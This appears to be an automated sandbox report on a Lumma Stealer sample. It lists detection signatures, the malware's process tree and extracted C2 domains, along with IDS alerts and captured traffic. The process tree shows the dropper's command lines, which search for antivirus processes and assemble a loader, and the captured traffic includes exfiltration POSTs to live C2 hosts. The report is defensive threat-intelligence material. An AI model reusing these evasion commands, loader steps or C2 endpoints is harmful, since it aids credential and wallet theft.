Edit tour

Windows Analysis Report
vUcZzNWkKc.exe

Overview

General Information

Sample name:	vUcZzNWkKc.exe renamed because original name is a hash value
Original sample name:	2882ead03a58608f2f73c66b861299a3.exe
Analysis ID:	1581585
MD5:	2882ead03a58608f2f73c66b861299a3
SHA1:	6a8adde3d6ceda99d430611a3e06a8bc6ec9bfe0
SHA256:	5866e752f869f91e6084a50c2ee65991de91b9e63f4ea9d1ac9bce9b4123a77d
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

vUcZzNWkKc.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\vUcZzNWkKc.exe" MD5: 2882EAD03A58608F2F73C66B861299A3)

PasoCattle.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)

cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7836 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7844 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7884 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7900 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7932 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7948 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7972 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7984 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Climb.com (PID: 8000 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 8032 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

Set-up.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["inherineau.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "spuriotis.click", "appliacnesot.buzz", "rebuildeso.buzz", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.vUcZzNWkKc.exe.610000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x78d71d:$s1: Runner 0x78d882:$s3: RunOnStartup 0x78d731:$a1: Antis 0x78d75e:$a2: antiVM 0x78d765:$a3: antiSandbox 0x78d771:$a4: antiDebug 0x78d77b:$a5: antiEmulator 0x78d788:$a6: enablePersistence 0x78d79a:$a7: enableFakeError 0x78d8ab:$a8: DetectVirtualMachine 0x78d8d0:$a9: DetectSandboxie 0x78d8fb:$a10: DetectDebugger 0x78d90a:$a11: CheckEmulator

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7900, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:33:36.486952+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.128.184	443	TCP
2024-12-28T09:33:58.029226+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	172.67.128.184	443	TCP
2024-12-28T09:34:00.455322+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	172.67.128.184	443	TCP
2024-12-28T09:34:02.816452+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	172.67.128.184	443	TCP
2024-12-28T09:34:05.267953+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	172.67.128.184	443	TCP
2024-12-28T09:34:07.623320+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	172.67.128.184	443	TCP
2024-12-28T09:34:09.995549+0100	2028371	3	Unknown Traffic	192.168.2.4	49747	172.67.128.184	443	TCP
2024-12-28T09:34:13.558667+0100	2028371	3	Unknown Traffic	192.168.2.4	49754	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:33:56.739542+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	172.67.128.184	443	TCP
2024-12-28T09:33:58.800935+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49741	172.67.128.184	443	TCP
2024-12-28T09:34:14.403022+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49754	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:33:56.739542+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49737	172.67.128.184	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:33:58.800935+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49741	172.67.128.184	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T09:34:08.468226+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49745	172.67.128.184	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vUcZzNWkKc.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrms	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrm	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["inherineau.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "spuriotis.click", "appliacnesot.buzz", "rebuildeso.buzz", "scentniej.buzz", "screwamusresz.buzz"], "Build id": "5FwhVM--lll"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

ReversingLabs: Detection: 69%

Multi AV Scanner detection for submitted file

Source: vUcZzNWkKc.exe	ReversingLabs: Detection: 47%
Source: vUcZzNWkKc.exe	Virustotal: Detection: 31%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: vUcZzNWkKc.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: spuriotis.click
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000003.1919033995.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String decryptor: 5FwhVM--lll

Source: vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_fccbe689-d

Source: vUcZzNWkKc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_00406301 FindFirstFileW,FindClose,		1_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		1_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49741 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49745 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49754 -> 172.67.128.184:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: spuriotis.click
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 451311Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 33 34 30 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View

IP Address: 3.218.7.103 3.218.7.103

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 172.67.128.184:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.128.184:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SZB9DPFPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18101Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BJ3R6HHLJRG3T2MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8764Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CFC8QXO2IQ469U639D6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20441Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9HK79OX2B6X1K0XFSJNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5M3LFGFBW5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550233Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top
Source: global traffic	DNS traffic detected: DNS query: spuriotis.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click

